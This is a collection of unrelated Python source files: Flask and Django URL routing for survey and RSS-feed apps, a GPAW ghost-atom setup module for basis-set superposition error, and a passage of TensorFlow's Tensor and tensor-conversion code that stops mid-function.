app.add_url_rule(
'/corruption-type/<string:corruption_type>/group/<string:group>',
view_func=CorruptionType.as_view('json_corruptiontype'))
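# Example of concrete URLs these rules match (group/qid/type values made up):
#   /                                          -> Index
#   /surveyee/distribution/gender              -> SurveyeeDistribution
#   /question/3/group/region                   -> GroupedAnswers
#   /question/3/group/region/disaggregate/age  -> GroupedAnswers (disaggregated)
#   /corruption-type/bribery/group/gender      -> CorruptionType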
|
from django.conf.urls import url
from apps.rss_feeds import views
urlpatterns = [
url(r'^feed_autocomplete', views.feed_autocomplete, name='feed-autocomplete'),
url(r'^search_feed', views.search_feed, name='search-feed'),
url(r'^statistics/(?P<feed_id>\d+)', views.load_feed_statistics, name='feed-statistics'),
url(r'^statistics_embedded/(?P<feed_id>\d+)', views.load_feed_statistics_embedded, name='feed-statistics-embedded'),
url(r'^feed_settings/(?P<feed_id>\d+)', views.load_feed_settings, name='feed-settings'),
url(r'^feed/(?P<feed_id>\d+)/?', views.load_single_feed, name='feed-info'),
url(r'^icon/(?P<feed_id>\d+)/?', views.load_feed_favicon, name='feed-favicon'),
url(r'^exception_retry', views.exception_retry, name='exception-retry'),
url(r'^exception_change_feed_address', views.exception_change_feed_address, name='exception-change-feed-address'),
url(r'^exception_change_feed_link', views.exception_change_feed_link, name='exception-change-feed-link'),
url(r'^status', views.status, name='status'),
url(r'^load_single_feed', views.load_single_feed, name='feed-canonical'),
url(r'^original_text', views.original_text, name='original-text'),
url(r'^original_story', views.original_story, name='original-story'),
url(r'^story_changes', views.story_changes, name='story-changes'),
]
|
"""BSSE: Basis Set Superposition Error module.
Defines a Setup-like class which has no properties that change anything,
except for an atomic basis set."""
import numpy as np
from ase.data import atomic_numbers
from gpaw.setup import BaseSetup
from gpaw.setup_data import SetupData
from gpaw.basis_data import Basis
from gpaw.spline import Spline
# Some splines are mandatory, but should then be zero to avoid affecting things
zero_function = Spline(0, 0.5, [0.0, 0.0, 0.0])
# Some operations fail horribly if the splines are zero, due to weird
# divisions and assumptions that various quantities are nonzero
#
# We'll use a function which is almost zero for these things
nonzero_function = Spline(0, 0.5, [0.0, 1.0e-12, 0.0]) # XXX
class GhostSetup(BaseSetup):
def __init__(self, basis, data):
self.symbol = data.symbol
self.data = data
self.phit_j = basis.tosplines()
self.basis = basis
self.niAO = sum([2 * phit.get_angular_momentum_number() + 1
for phit in self.phit_j])
self.HubU = None
self.filename = None
self.fingerprint = None
self.type = 'ghost'
self.Z = 0
self.Nv = 0
self.Nc = 0
self.ni = 1
self.pt_j = [zero_function]
self.wg_lg = None
self.g_lg = None
self.Nct = 1e-12 # XXX XXX XXX XXX
self.nct = nonzero_function # XXXXXX
self.lmax = 0
self.xc_correction = None
self.ghat_l = [nonzero_function] * (self.lmax + 1) # XXXXXX
self.rcgauss = 1e12 # XXX XXX XXX XXX
self.vbar = zero_function
self.Delta0 = 0.0
self.Delta_pL = np.zeros((1, self.lmax + 1))
self.E = 0.0
self.Kc = 0.0
self.M = 0.0
self.M_p = np.zeros(1)
self.M_pp = np.zeros((1, 1))
self.K_p = np.zeros(1)
self.MB = 0.0
self.MB_p = np.zeros(1)
self.dO_ii = np.zeros((1, 1))
self.f_j = [0.0]
self.n_j = [0]
self.l_j = [0]
self.nj = 1
self.lq = None # XXXX
self.rcutfilter = None
self.rcore = None
self.N0_p = np.zeros(1)
self.nabla_iiv = None
self.phicorehole_g = None
self.rgd = None
self.rcut_j = [0.5]
self.tauct = None
self.Delta_Lii = None
self.B_ii = None
self.dC_ii = None
self.X_p = None
self.ExxC = None
self.dEH0 = 0.0
self.dEH_p = np.zeros(1)
self.extra_xc_data = {}
class GhostSetupData:
def __init__(self, symbol):
self.chemsymbol = symbol
self.symbol = symbol + '.ghost'
self.Z = atomic_numbers[symbol]
def build(self, xcfunc, lmax, basis):
if basis is None:
raise ValueError('Loading partial waves not supported right now')
setup = GhostSetup(basis, self)
return setup
def print_info(self, text, _setup):
text('Ghost setup for %s' % self.chemsymbol)
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Classes and functions used to construct graphs."""
# pylint: disable=g-bad-name
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import linecache
import os
import re
import sys
import threading
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import function_pb2
from tensorflow.core.framework import graph_pb2
from tensorflow.core.framework import node_def_pb2
from tensorflow.core.framework import op_def_pb2
from tensorflow.core.framework import versions_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow as c_api
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import tape
from tensorflow.python.framework import c_api_util
from tensorflow.python.framework import cpp_shape_inference_pb2
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import op_def_registry
from tensorflow.python.framework import registry
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import control_flow_util
from tensorflow.python.platform import app
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import compat
from tensorflow.python.util import decorator_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util.deprecation import deprecated_args
from tensorflow.python.util.tf_export import tf_export
# Temporary global switches determining if we should enable the work-in-progress
# calls to the C API. These will be removed once all functionality is supported.
_USE_C_API = True
_USE_C_SHAPES = os.getenv("TF_C_API_GRAPH_CONSTRUCTION_SHAPES", "0") != "0"
def tensor_id(tensor):
"""Returns a unique identifier for this Tensor."""
return tensor._id # pylint: disable=protected-access
class _NullContextmanager(object):
def __enter__(self):
pass
def __exit__(self, type_arg, value_arg, traceback_arg):
return False # False values do not suppress exceptions
def _override_helper(clazz_object, operator, func):
"""Overrides (string) operator on Tensors to call func.
Args:
clazz_object: the class to override for; either Tensor or SparseTensor.
operator: the string name of the operator to override.
func: the function that replaces the overridden operator.
Raises:
ValueError: If operator has already been overwritten,
or if operator is not allowed to be overwritten.
"""
existing = getattr(clazz_object, operator, None)
if existing is not None:
# Check to see if this is a default method-wrapper or slot wrapper which
# will be true for the comparison operators.
if not isinstance(existing, type(object.__lt__)):
raise ValueError("operator %s cannot be overwritten again on class %s." %
(operator, clazz_object))
if operator not in Tensor.OVERLOADABLE_OPERATORS:
raise ValueError("Overriding %s is disallowed" % operator)
setattr(clazz_object, operator, func)
def _as_graph_element(obj):
"""Convert `obj` to a graph element if possible, otherwise return `None`.
Args:
obj: Object to convert.
Returns:
The result of `obj._as_graph_element()` if that method is available;
otherwise `None`.
"""
conv_fn = getattr(obj, "_as_graph_element", None)
if conv_fn and callable(conv_fn):
return conv_fn()
return None
_TENSOR_LIKE_TYPES = tuple()
def is_dense_tensor_like(t):
"""EXPERIMENTAL: Returns true if `t` implements the tensor interface.
See `register_dense_tensor_like_type()` for the current definition of a
"tensor-like type".
Args:
t: An object.
Returns:
True iff `t` is an instance of one of the registered "tensor-like" types.
"""
return isinstance(t, _TENSOR_LIKE_TYPES)
def register_dense_tensor_like_type(tensor_type):
"""EXPERIMENTAL: Registers `tensor_type` as implementing the tensor interface.
A "tensor-like type" can represent a single dense tensor, and implements
the `name` and `dtype` properties.
Args:
tensor_type: A type implementing the tensor interface.
Raises:
TypeError: If `tensor_type` does not implement the tensor interface.
"""
try:
if not isinstance(tensor_type.name, property):
raise TypeError("Type %s does not define a `name` property" %
tensor_type.__name__)
except AttributeError:
raise TypeError("Type %s does not define a `name` property" %
tensor_type.__name__)
try:
if not isinstance(tensor_type.dtype, property):
raise TypeError("Type %s does not define a `dtype` property" %
tensor_type.__name__)
except AttributeError:
raise TypeError("Type %s does not define a `dtype` property" %
tensor_type.__name__)
# We expect this list to be small, so choose quadratic complexity
# for registration, so that we have a tuple that can be used for
# more efficient `isinstance` checks later.
global _TENSOR_LIKE_TYPES
_TENSOR_LIKE_TYPES = tuple(list(_TENSOR_LIKE_TYPES) + [tensor_type])
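# Illustrative-only sketch (not part of TensorFlow) of a type that would pass
# the checks above -- it only needs `name` and `dtype` defined as properties:
#
#   class _DenseLikeStub(object):
#
#     @property
#     def name(self):
#       return "dense_like_stub:0"
#
#     @property
#     def dtype(self):
#       return dtypes.float32
#
#   register_dense_tensor_like_type(_DenseLikeStub)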
def uid():
"""A unique (within this program execution) integer."""
return c_api.TFE_Py_UID()
def numpy_text(tensor, is_repr=False):
"""Human readable representation of a tensor's numpy value."""
if tensor.dtype.is_numpy_compatible:
text = repr(tensor.numpy()) if is_repr else str(tensor.numpy())
else:
text = "<unprintable>"
if "\n" in text:
text = "\n" + text
return text
# NOTE(ebrevdo): Do not subclass this. If you do, I will break you on purpose.
class _TensorLike(object):
"""Internal cls for grouping Tensor, SparseTensor, ..., for is_instance."""
pass
@tf_export("Tensor")
class Tensor(_TensorLike):
"""Represents one of the outputs of an `Operation`.
A `Tensor` is a symbolic handle to one of the outputs of an
`Operation`. It does not hold the values of that operation's output,
but instead provides a means of computing those values in a
TensorFlow @{tf.Session}.
This class has two primary purposes:
1. A `Tensor` can be passed as an input to another `Operation`.
This builds a dataflow connection between operations, which
enables TensorFlow to execute an entire `Graph` that represents a
large, multi-step computation.
2. After the graph has been launched in a session, the value of the
`Tensor` can be computed by passing it to
@{tf.Session.run}.
`t.eval()` is a shortcut for calling
`tf.get_default_session().run(t)`.
In the following example, `c`, `d`, and `e` are symbolic `Tensor`
objects, whereas `result` is a numpy array that stores a concrete
value:
```python
# Build a dataflow graph.
c = tf.constant([[1.0, 2.0], [3.0, 4.0]])
d = tf.constant([[1.0, 1.0], [0.0, 1.0]])
e = tf.matmul(c, d)
# Construct a `Session` to execute the graph.
sess = tf.Session()
# Execute the graph and store the value that `e` represents in `result`.
result = sess.run(e)
```
"""
# List of Python operators that we allow to override.
OVERLOADABLE_OPERATORS = {
# Binary.
"__add__",
"__radd__",
"__sub__",
"__rsub__",
"__mul__",
"__rmul__",
"__div__",
"__rdiv__",
"__truediv__",
"__rtruediv__",
"__floordiv__",
"__rfloordiv__",
"__mod__",
"__rmod__",
"__lt__",
"__le__",
"__gt__",
"__ge__",
"__and__",
"__rand__",
"__or__",
"__ror__",
"__xor__",
"__rxor__",
"__getitem__",
"__pow__",
"__rpow__",
# Unary.
"__invert__",
"__neg__",
"__abs__",
"__matmul__",
"__rmatmul__"
}
def __init__(self, op, value_index, dtype):
"""Creates a new `Tensor`.
Args:
op: An `Operation`. `Operation` that computes this tensor.
value_index: An `int`. Index of the operation's endpoint that produces
this tensor.
dtype: A `DType`. Type of elements stored in this tensor.
Raises:
TypeError: If the op is not an `Operation`.
"""
if not isinstance(op, Operation):
raise TypeError("op needs to be an Operation: %s" % op)
self._op = op
self._value_index = value_index
self._dtype = dtypes.as_dtype(dtype)
# This will be set by self.shape().
self._shape_val = None
# List of operations that use this Tensor as input. We maintain this list
# to easily navigate a computation graph.
self._consumers = []
if not _USE_C_SHAPES:
# Attributes used for C++ shape inference. Not inspected, only forwarded.
# If set, will be a HandleData object from cpp_shape_inference.proto.
self._handle_data = None
self._id = uid()
@property
def op(self):
"""The `Operation` that produces this tensor as an output."""
return self._op
@property
def dtype(self):
"""The `DType` of elements in this tensor."""
return self._dtype
@property
def graph(self):
"""The `Graph` that contains this tensor."""
return self._op.graph
@property
def name(self):
"""The string name of this tensor."""
if not self._op.name:
raise ValueError("Operation was not named: %s" % self._op)
return "%s:%d" % (self._op.name, self._value_index)
@property
def device(self):
"""The name of the device on which this tensor will be produced, or None."""
return self._op.device
@property
def shape(self):
"""Returns the `TensorShape` that represents the shape of this tensor.
The shape is computed using shape inference functions that are
registered in the Op for each `Operation`. See
@{tf.TensorShape}
for more details of what a shape represents.
The inferred shape of a tensor is used to provide shape
information without having to launch the graph in a session. This
can be used for debugging, and providing early error messages. For
example:
```python
c = tf.constant([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
print(c.shape)
==> TensorShape([Dimension(2), Dimension(3)])
d = tf.constant([[1.0, 0.0], [0.0, 1.0], [1.0, 0.0], [0.0, 1.0]])
print(d.shape)
==> TensorShape([Dimension(4), Dimension(2)])
# Raises a ValueError, because `c` and `d` do not have compatible
# inner dimensions.
e = tf.matmul(c, d)
f = tf.matmul(c, d, transpose_a=True, transpose_b=True)
print(f.shape)
==> TensorShape([Dimension(3), Dimension(4)])
```
In some cases, the inferred shape may have unknown dimensions. If
the caller has additional information about the values of these
dimensions, `Tensor.set_shape()` can be used to augment the
inferred shape.
Returns:
A `TensorShape` representing the shape of this tensor.
"""
if self._shape_val is None:
if _USE_C_SHAPES:
self._shape_val = self._c_api_shape()
else:
# Call set_shape_and_handle_data_for_outputs in topological order on all
# ops that are needed to compute self.op's shape. We do this instead of
# having set_shape_and_handle_data_for_outputs recursively call
        # Operation.shape on self.op.inputs, to avoid overflowing the call
        # stack.
need_shapes = self._get_input_ops_without_shapes(self.op)
need_shapes.sort(key=lambda op: op._id)
for op in need_shapes:
set_shape_and_handle_data_for_outputs(op)
return self._shape_val
def _get_input_ops_without_shapes(self, target_op):
"""Returns ops needing shape inference to compute target_op's shape."""
result = []
stack = [self._op]
visited = set()
while stack:
op = stack.pop()
if op in visited: continue
result.append(op)
stack.extend(t.op for t in op.inputs if t._shape_val is None)
visited.add(op)
return result
def _c_api_shape(self):
"""Returns the TensorShape of this tensor according to the C API."""
c_graph = self._op._graph._c_graph # pylint: disable=protected-access
shape_vector, unknown_shape = c_api.TF_GraphGetTensorShapeHelper(
c_graph, self._as_tf_output())
if unknown_shape:
return tensor_shape.unknown_shape()
else:
shape_vector = [None if d == -1 else d for d in shape_vector]
return tensor_shape.TensorShape(shape_vector)
@property
def _shape(self):
logging.warning("Tensor._shape is private, use Tensor.shape "
"instead. Tensor._shape will eventually be removed.")
return self.shape
@_shape.setter
def _shape(self, value):
raise ValueError(
"Tensor._shape cannot be assigned, use Tensor.set_shape instead.")
def __iter__(self):
if not context.executing_eagerly():
raise TypeError(
"Tensor objects are not iterable when eager execution is not "
"enabled. To iterate over this tensor use tf.map_fn.")
shape = self._shape_tuple()
if shape is None:
raise TypeError("Cannot iterate over a tensor with unknown shape.")
if not shape:
raise TypeError("Cannot iterate over a scalar tensor.")
if shape[0] is None:
raise TypeError(
"Cannot iterate over a tensor with unknown first dimension.")
for i in xrange(shape[0]):
yield self[i]
def _shape_as_list(self):
if self.shape.ndims is not None:
return [dim.value for dim in self.shape.dims]
else:
return None
def _shape_tuple(self):
shape = self._shape_as_list()
if shape is None:
return None
return tuple(shape)
def _rank(self):
"""Integer rank of this Tensor, if known, else None.
Returns:
Integer rank or None
"""
return self.shape.ndims
def get_shape(self):
"""Alias of Tensor.shape."""
return self.shape
def set_shape(self, shape):
"""Updates the shape of this tensor.
This method can be called multiple times, and will merge the given
`shape` with the current shape of this tensor. It can be used to
provide additional information about the shape of this tensor that
cannot be inferred from the graph alone. For example, this can be used
to provide additional information about the shapes of images:
```python
_, image_data = tf.TFRecordReader(...).read(...)
image = tf.image.decode_png(image_data, channels=3)
# The height and width dimensions of `image` are data dependent, and
# cannot be computed without executing the op.
print(image.shape)
==> TensorShape([Dimension(None), Dimension(None), Dimension(3)])
# We know that each image in this dataset is 28 x 28 pixels.
image.set_shape([28, 28, 3])
print(image.shape)
==> TensorShape([Dimension(28), Dimension(28), Dimension(3)])
```
Args:
shape: A `TensorShape` representing the shape of this tensor, a
`TensorShapeProto`, a list, a tuple, or None.
Raises:
ValueError: If `shape` is not compatible with the current shape of
this tensor.
"""
if _USE_C_SHAPES: # pylint: disable=protected-access
# Reset cached shape.
self._shape_val = None
else:
self._shape_val = self.shape.merge_with(shape)
# Update C shape even if _USE_C_SHAPES = False, since we still want
# set_shape to be reflected in the C API graph for when we run it.
if not isinstance(shape, tensor_shape.TensorShape):
shape = tensor_shape.TensorShape(shape)
dim_list = []
if shape.dims is None:
unknown_shape = True
else:
unknown_shape = False
for dim in shape.dims:
if dim.value is None:
dim_list.append(-1)
else:
dim_list.append(dim.value)
try:
c_api.TF_GraphSetTensorShape_wrapper(
self._op._graph._c_graph, # pylint: disable=protected-access
self._as_tf_output(),
dim_list,
unknown_shape)
except errors.InvalidArgumentError as e:
# Convert to ValueError for backwards compatibility.
raise ValueError(str(e))
@property
def value_index(self):
"""The index of this tensor in the outputs of its `Operation`."""
return self._value_index
def consumers(self):
"""Returns a list of `Operation`s that consume this tensor.
Returns:
A list of `Operation`s.
"""
consumer_names = c_api.TF_OperationOutputConsumers_wrapper(
self._as_tf_output())
# pylint: disable=protected-access
return [
self.graph._get_operation_by_name_unsafe(name)
for name in consumer_names
]
# pylint: enable=protected-access
def _as_node_def_input(self):
"""Return a value to use for the NodeDef "input" attribute.
The returned string can be used in a NodeDef "input" attribute
to indicate that the NodeDef uses this Tensor as input.
Raises:
ValueError: if this Tensor's Operation does not have a name.
Returns:
a string.
"""
if not self._op.name:
raise ValueError("Operation was not named: %s" % self._op)
if self._value_index == 0:
return self._op.name
else:
return "%s:%d" % (self._op.name, self._value_index)
def _as_tf_output(self):
# pylint: disable=protected-access
return c_api_util.tf_output(self.op._c_op, self.value_index)
# pylint: enable=protected-access
def __str__(self):
return "Tensor(\"%s\"%s%s%s)" % (
self.name, (", shape=%s" % self.get_shape())
if self.get_shape().ndims is not None else "",
(", dtype=%s" % self._dtype.name)
if self._dtype else "", (", device=%s" % self.device)
if self.device else "")
def __repr__(self):
return "<tf.Tensor '%s' shape=%s dtype=%s>" % (self.name, self.get_shape(),
self._dtype.name)
def __hash__(self):
# Necessary to support Python's collection membership operators
return id(self)
def __eq__(self, other):
# Necessary to support Python's collection membership operators
return id(self) == id(other)
def __copy__(self):
# Make sure _shape_val is computed before we copy.
# TODO(b/77597810): get rid of Tensor copies.
if self._shape_val is None:
set_shape_and_handle_data_for_outputs(self.op)
cls = self.__class__
result = cls.__new__(cls)
result.__dict__.update(self.__dict__)
return result
# NOTE(mrry): This enables the Tensor's overloaded "right" binary
# operators to run when the left operand is an ndarray, because it
# accords the Tensor class higher priority than an ndarray, or a
# numpy matrix.
# TODO(mrry): Convert this to using numpy's __numpy_ufunc__
# mechanism, which allows more control over how Tensors interact
# with ndarrays.
__array_priority__ = 100
@staticmethod
def _override_operator(operator, func):
_override_helper(Tensor, operator, func)
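  # Note (added): _override_operator is the hook used elsewhere to attach
  # arithmetic behavior to Tensor, e.g. Tensor._override_operator("__neg__",
  # some_neg_fn) for any name in OVERLOADABLE_OPERATORS; `some_neg_fn` is a
  # placeholder here, not a real TensorFlow function.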
def __bool__(self):
"""Dummy method to prevent a tensor from being used as a Python `bool`.
This overload raises a `TypeError` when the user inadvertently
treats a `Tensor` as a boolean (e.g. in an `if` statement). For
example:
```python
if tf.constant(True): # Will raise.
# ...
if tf.constant(5) < tf.constant(7): # Will raise.
# ...
```
This disallows ambiguities between testing the Python value vs testing the
dynamic condition of the `Tensor`.
Raises:
`TypeError`.
"""
raise TypeError("Using a `tf.Tensor` as a Python `bool` is not allowed. "
"Use `if t is not None:` instead of `if t:` to test if a "
"tensor is defined, and use TensorFlow ops such as "
"tf.cond to execute subgraphs conditioned on the value of "
"a tensor.")
def __nonzero__(self):
"""Dummy method to prevent a tensor from being used as a Python `bool`.
This is the Python 2.x counterpart to `__bool__()` above.
Raises:
`TypeError`.
"""
raise TypeError("Using a `tf.Tensor` as a Python `bool` is not allowed. "
"Use `if t is not None:` instead of `if t:` to test if a "
"tensor is defined, and use TensorFlow ops such as "
"tf.cond to execute subgraphs conditioned on the value of "
"a tensor.")
def eval(self, feed_dict=None, session=None):
"""Evaluates this tensor in a `Session`.
Calling this method will execute all preceding operations that
produce the inputs needed for the operation that produces this
tensor.
*N.B.* Before invoking `Tensor.eval()`, its graph must have been
launched in a session, and either a default session must be
available, or `session` must be specified explicitly.
Args:
feed_dict: A dictionary that maps `Tensor` objects to feed values.
See @{tf.Session.run} for a
description of the valid feed values.
session: (Optional.) The `Session` to be used to evaluate this tensor. If
none, the default session will be used.
Returns:
A numpy array corresponding to the value of this tensor.
"""
return _eval_using_default_session(self, feed_dict, self.graph, session)
# TODO(agarwal): consider getting rid of this.
class _EagerTensorBase(Tensor):
"""Base class for EagerTensor."""
@property
def dtype(self):
# Note: using the intern table directly here as this is
# performance-sensitive in some models.
return dtypes._INTERN_TABLE[self._datatype_enum()] # pylint: disable=protected-access
def numpy(self):
"""Returns a numpy array or a scalar with the same contents as the Tensor.
TODO(ashankar,agarwal): Perhaps this should NOT reference the underlying
buffer but instead always explicitly copy? Note that currently it may or may
not copy based on whether the numpy data is properly aligned or not.
Returns:
A numpy array or a scalar. Numpy array may share memory with the
Tensor object. Any changes to one may be reflected in the other. A scalar
value is returned when self has rank 0.
Raises:
ValueError: if the type of this Tensor is not representable in numpy.
"""
if self.dtype == dtypes.resource:
raise ValueError("Resource handles are not convertible to numpy.")
return self.cpu()._numpy() # pylint: disable=protected-access
# __int__ and __float__ may copy the tensor to CPU and
# only work for scalars; values are cast as per numpy.
def __int__(self):
return int(self.numpy())
def __float__(self):
return float(self.numpy())
def __array__(self, dtype=None):
return np.array(self.numpy(), dtype=dtype)
def __format__(self, format_spec):
return self.numpy().__format__(format_spec)
def _numpy(self):
raise NotImplementedError()
def __copy__(self):
# Eager Tensors are immutable so it's safe to return themselves as a copy.
return self
def __deepcopy__(self, memo):
# Eager Tensors are immutable so it's safe to return themselves as a copy.
del memo
return self
def _datatype_enum(self):
raise NotImplementedError()
def _shape_tuple(self):
"""The shape of this Tensor, as a tuple.
This is more performant than tuple(shape().as_list()) as it avoids
two list and one object creation. Marked private for now as from an API
perspective, it would be better to have a single performant way of
getting a shape rather than exposing shape() and shape_tuple()
(and heaven forbid, shape_list() etc. as well!). Punting on that for now,
but ideally one would work things out and remove the need for this method.
Returns:
tuple with the shape.
"""
raise NotImplementedError()
def _rank(self):
"""Integer rank of this Tensor.
Unlike regular Tensors, the rank is always known for EagerTensors.
This is more performant than len(self._shape_tuple())
Returns:
Integer rank
"""
raise NotImplementedError()
def _copy_to_device(self, context, device): # pylint: disable=redefined-outer-name
raise NotImplementedError()
def __str__(self):
return "tf.Tensor(%s, shape=%s, dtype=%s)" % (numpy_text(self),
self.shape,
self.dtype.name)
def __repr__(self):
return "<tf.Tensor: id=%s, shape=%s, dtype=%s, numpy=%s>" % (
self._id, self.shape, self.dtype.name, numpy_text(self, is_repr=True))
@staticmethod
def _override_operator(name, func):
setattr(_EagerTensorBase, name, func)
def _copy(self, ctx=None, device_name=None):
"""Copies tensor to dest device."""
# pylint: disable=protected-access
# Creates a new tensor on the dest device.
if ctx is None:
ctx = context.context()
if device_name is None:
device_name = ctx.device_name
# pylint: disable=protected-access
try:
new_tensor = self._copy_to_device(context=ctx._handle, device=device_name)
except core._NotOkStatusException as e:
six.raise_from(core._status_to_exception(e.code, e.message), None)
# Record the copy on tape and define backprop copy as well.
if context.executing_eagerly():
self_device = self.device
def grad_fun(dresult):
return [dresult._copy(device_name=self_device)]
tape.record_operation("_copy", [new_tensor], [self], grad_fun)
return new_tensor
# pylint: enable=protected-access
@property
def shape(self):
if self._tensor_shape is None: # pylint: disable=access-member-before-definition
# `_tensor_shape` is declared and defined in the definition of
# `EagerTensor`, in C.
self._tensor_shape = tensor_shape.TensorShape(self._shape_tuple())
return self._tensor_shape
def get_shape(self):
"""Alias of Tensor.shape."""
return self.shape
def _shape_as_list(self):
"""The shape of the tensor as a list."""
return list(self._shape_tuple())
@property
def ndim(self):
"""Returns the number of Tensor dimensions."""
return self.shape.ndims
def cpu(self):
"""A copy of this Tensor with contents backed by host memory."""
return self._copy(context.context(), "CPU:0")
def gpu(self, gpu_index=0):
"""A copy of this Tensor with contents backed by memory on the GPU.
Arguments:
      gpu_index: Identifies which GPU the contents of the returned Tensor
        should be placed on.
Returns:
A GPU-memory backed Tensor object initialized with the same contents
as this Tensor.
"""
return self._copy(context.context(), "GPU:" + str(gpu_index))
def __bool__(self):
if self._shape_tuple() != (): # pylint: disable=g-explicit-bool-comparison
raise ValueError(
"Non-scalar tensor %s cannot be converted to boolean." % repr(self))
if self.dtype != dtypes.bool:
raise ValueError(
"Non-boolean tensor %s cannot be converted to boolean." % repr(self))
return bool(self.cpu().numpy())
def __nonzero__(self):
return self.__bool__()
def set_shape(self, shape):
if not self.shape.is_compatible_with(shape):
raise ValueError(
"Tensor's shape %s is not compatible with supplied shape %s" %
(self.shape, shape))
# Methods not supported / implemented for Eager Tensors.
@property
def op(self):
raise AttributeError(
"Tensor.op is meaningless when eager execution is enabled.")
@property
def graph(self):
raise AttributeError(
"Tensor.graph is meaningless when eager execution is enabled.")
@property
def name(self):
raise AttributeError(
"Tensor.name is meaningless when eager execution is enabled.")
@property
def value_index(self):
raise AttributeError(
"Tensor.value_index is meaningless when eager execution is enabled.")
def consumers(self):
raise NotImplementedError(
"Tensor.consumers is meaningless when eager execution is enabled.")
def _add_consumer(self, consumer):
raise NotImplementedError(
"_add_consumer not supported when eager execution is enabled.")
def _as_node_def_input(self):
raise NotImplementedError(
"_as_node_def_input not supported when eager execution is enabled.")
def _as_tf_output(self):
raise NotImplementedError(
"_as_tf_output not supported when eager execution is enabled.")
def eval(self, feed_dict=None, session=None):
raise NotImplementedError(
"eval is not supported when eager execution is enabled, "
"is .numpy() what you're looking for?"
)
# This call creates an EagerTensor class, as a subclass of _EagerTensorBase, and
# registers it with the current module.
EagerTensor = c_api.TFE_Py_InitEagerTensor(_EagerTensorBase)
def _TensorTensorConversionFunction(t, dtype=None, name=None, as_ref=False):
_ = name, as_ref
if dtype and not dtype.is_compatible_with(t.dtype):
raise ValueError(
"Tensor conversion requested dtype %s for Tensor with dtype %s: %r" %
(dtype.name, t.dtype.name, str(t)))
return t
_tensor_conversion_func_registry = {
0: [(Tensor, _TensorTensorConversionFunction)]
}
_tensor_conversion_func_cache = {}
_tensor_conversion_func_lock = threading.Lock()
register_dense_tensor_like_type(Tensor)
@tf_export("convert_to_tensor")
def convert_to_tensor(value, dtype=None, name=None, preferred_dtype=None):
"""Converts the given `value` to a `Tensor`.
This function converts Python objects of various types to `Tensor`
objects. It accepts `Tensor` objects, numpy arrays, Python lists,
and Python scalars. For example:
```python
import numpy as np
def my_func(arg):
arg = tf.convert_to_tensor(arg, dtype=tf.float32)
return tf.matmul(arg, arg) + arg
# The following calls are equivalent.
value_1 = my_func(tf.constant([[1.0, 2.0], [3.0, 4.0]]))
value_2 = my_func([[1.0, 2.0], [3.0, 4.0]])
value_3 = my_func(np.array([[1.0, 2.0], [3.0, 4.0]], dtype=np.float32))
```
This function can be useful when composing a new operation in Python
(such as `my_func` in the example above). All standard Python op
constructors apply this function to each of their Tensor-valued
inputs, which allows those ops to accept numpy arrays, Python lists,
and scalars in addition to `Tensor` objects.
Note: This function diverges from default Numpy behavior for `float` and
`string` types when `None` is present in a Python list or scalar. Rather
than silently converting `None` values, an error will be thrown.
Args:
value: An object whose type has a registered `Tensor` conversion function.
dtype: Optional element type for the returned tensor. If missing, the
type is inferred from the type of `value`.
name: Optional name to use if a new `Tensor` is created.
preferred_dtype: Optional element type for the returned tensor,
used when dtype is None. In some cases, a caller may not have a
dtype in mind when converting to a tensor, so preferred_dtype
can be used as a soft preference. If the conversion to
`preferred_dtype` is not possible, this argument has no effect.
Returns:
A `Tensor` based on `value`.
Raises:
TypeError: If no conversion function is registered for `value`.
RuntimeError: If a registered conversion function returns an invalid value.
"""
return internal_convert_to_tensor(
value=value,
dtype=dtype,
name=name,
preferred_dtype=preferred_dtype,
as_ref=False)
def _error_prefix(name):
return "" if name is None else "%s: " % name
def internal_convert_to_tensor(value,
dtype=None,
name=None,
as_ref=False,
preferred_dtype=None,
ctx=None):
"""Converts the given `value` to an `Tensor`.
This function converts Python objects of various types to `Tensor`
objects. It accepts `Tensor` objects, numpy arrays, Python lists,
and Python scalars. For example:
This function can be useful when composing a new operation in Python
All standard Python op constructors apply this function to each of their
Tensor-valued inputs, which allows those ops to accept numpy arrays, Python
lists, and scalars in addition to `Tensor` objects.
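For example, `preferred_dtype` acts only as a soft hint; a brief sketch via
the public `tf.convert_to_tensor` wrapper (exact fallback dtypes may vary):
```python
t = tf.convert_to_tensor(37, preferred_dtype=tf.float32)
# 37 is representable as float32, so t.dtype is tf.float32.
u = tf.convert_to_tensor(3.7, preferred_dtype=tf.int32)
# 3.7 cannot be losslessly converted to int32, so the hint is ignored and
# u.dtype typically falls back to tf.float32.
```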
Args:
value: An object whose type has a registered `Tensor` conversion function.
dtype: Optional element type for the returned tensor. If missing, the
type is inferred from the type of `value`.
name: Optional name to use if a new `Tensor` is created.
as_ref: True if we want the mutable view of Variables, if applicable.
preferred_dtype: Optional element type for the returned tensor,
used when dtype is None. In some cases, a caller may not have a
dtype in mind when converting to a tensor, so preferred_dtype
can be used as a soft preference. If the conversion to
`preferred_dtype` is not possible, this argument has no effect.
ctx: Optional: The value of context.context().
Returns:
A `Tensor` based on `value`.
Raises:
TypeError: If no conversion function is registered for `value`.
RuntimeError: If a registered conversion function returns an invalid value.
"""
if ctx is None: ctx = context.context()
if isinstance(value, EagerTensor):
if ctx.executing_eagerly():
# Fast path for EagerTensors that don't need any conversion.
# Note that we don't check that value's dtype matches the dtype
# argument. We expect that the C runtime will do that checking
# when we execute the kernel.
return value
else:
graph = get_default_graph()
if not graph.building_function:
